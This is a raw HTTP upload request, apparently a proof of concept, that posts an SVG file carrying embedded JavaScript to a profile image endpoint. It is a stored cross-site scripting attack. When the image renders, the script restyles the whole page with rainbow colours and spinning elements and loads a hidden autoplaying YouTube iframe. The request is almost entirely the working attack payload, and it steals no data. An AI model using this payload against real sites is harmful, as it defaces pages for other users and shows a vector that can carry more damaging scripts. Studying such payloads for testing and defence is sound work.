POST /profile/upload HTTP/1.1
Host: XXXXXXXXX.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer XXXXXXXXXXXXXXXXXX
Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
Connection: close
Referer: https://XXXXXXXXX
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      var style = document.createElement('style');
style.innerHTML=`* {
    background: red;
    background: -webkit-linear-gradient(left, red, orange, #ff0, green, #0ff, #00f, violet);
    background: -o-linear-gradient(right, red, orange, #ff0, green, #0ff, #00f, violet);
    background: -moz-linear-gradient(right, red, orange, #ff0, green, #0ff, #00f, violet);
    background: linear-gradient(to right, red, orange, #ff0, green, #0ff, #00f, violet);
    -webkit-background-clip: text;
    -webkit-text-fill-color: transparent;
    animation-name: example;
    animation-duration: 4s;
    animation-iteration-count: infinite;
    animation-timing-function: ease;
}
@keyframes example {
    0% {
        background: red;
        background: -webkit-linear-gradient(left, red, orange, #ff0, green, #0ff, #00f, violet);
        background: -o-linear-gradient(right, red, orange, #ff0, green, #0ff, #00f, violet);
        background: -moz-linear-gradient(right, red, orange, #ff0, green, #0ff, #00f, violet);
        background: linear-gradient(to right, red, orange, #ff0, green, #0ff, #00f, violet);
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent;
    }
    14.29% {
        background: orange;
        background: -webkit-linear-gradient(left, orange, #ff0, green, #0ff, #00f, violet, red);
        background: -o-linear-gradient(right, orange, #ff0, green, #0ff, #00f, violet, red);
        background: -moz-linear-gradient(right, orange, #ff0, green, #0ff, #00f, violet, red);
        background: linear-gradient(to right, orange, #ff0, green, #0ff, #00f, violet, red);
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent;
    }
    28.57% {
        background: #ff0;
        background: -webkit-linear-gradient(left, #ff0, green, #0ff, #00f, violet, red, orange);
        background: -o-linear-gradient(right, #ff0, green, #0ff, #00f, violet, red, orange);
        background: -moz-linear-gradient(right, #ff0, green, #0ff, #00f, violet, red, orange);
        background: linear-gradient(to right, #ff0, green, #0ff, #00f, violet, red, orange);
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent;
    }
    42.86% {
        background: green;
        background: -webkit-linear-gradient(left, green, #0ff, #00f, violet, red, orange, #ff0);
        background: -o-linear-gradient(right, green, #0ff, #00f, violet, red, orange, #ff0);
        background: -moz-linear-gradient(right, green, #0ff, #00f, violet, red, orange, #ff0);
        background: linear-gradient(to right, green, #0ff, #00f, violet, red, orange, #ff0);
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent;
    }
    57.14% {
        background: #0ff;
        background: -webkit-linear-gradient(left, #0ff, #00f, violet, red, orange, #ff0, green);
        background: -o-linear-gradient(right, #0ff, #00f, violet, red, orange, #ff0, green);
        background: -moz-linear-gradient(right, #0ff, #00f, violet, red, orange, #ff0, green);
        background: linear-gradient(to right, #0ff, #00f, violet, red, orange, #ff0, green);
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent;
    }
    71.43% {
        background: #00f;
        background: -webkit-linear-gradient(left, #00f, violet, red, orange, #ff0, green, #0ff);
        background: -o-linear-gradient(right, #00f, violet, red, orange, #ff0, green, #0ff);
        background: -moz-linear-gradient(right, #00f, violet, red, orange, #ff0, green, #0ff);
        background: linear-gradient(to right, #00f, violet, red, orange, #ff0, green, #0ff);
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent;
    }
    85.71% {
        background: violet;
        background: -webkit-linear-gradient(left, violet, red, orange, #ff0, green, #0ff, #00f);
        background: -o-linear-gradient(right, violet, red, orange, #ff0, green, #0ff, #00f);
        background: -moz-linear-gradient(right, violet, red, orange, #ff0, green, #0ff, #00f);
        background: linear-gradient(to right, violet, red, orange, #ff0, green, #0ff, #00f);
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent;
    }
    100% {
        background: red;
        background: -webkit-linear-gradient(left, red, orange, #ff0, green, #0ff, #00f, violet);
        background: -o-linear-gradient(right, red, orange, #ff0, green, #0ff, #00f, violet);
        background: -moz-linear-gradient(right, red, orange, #ff0, green, #0ff, #00f, violet);
        background: linear-gradient(to right, red, orange, #ff0, green, #0ff, #00f, violet);
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent;
    }
}


img, span, li , canvas, button, input, h1,h2,h3,h4,h5{
  animation-name: spin;
  animation-duration: 5000ms;
  animation-iteration-count: infinite;
  animation-timing-function: linear; 
}

@keyframes spin {
    from {
        transform:rotate(0deg);
    }
    to {
        transform:rotate(360deg);
    }
}
`;

var ref = document.querySelector('script');
ref.parentNode.insertBefore(style, ref);
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "https://www.youtube.com/embed/B-N1yJyrQRY?autoplay=1";
iframe.allow = "autoplay";
document.body.appendChild(iframe);
   </script>
</svg>
-----------------------------232181429808--
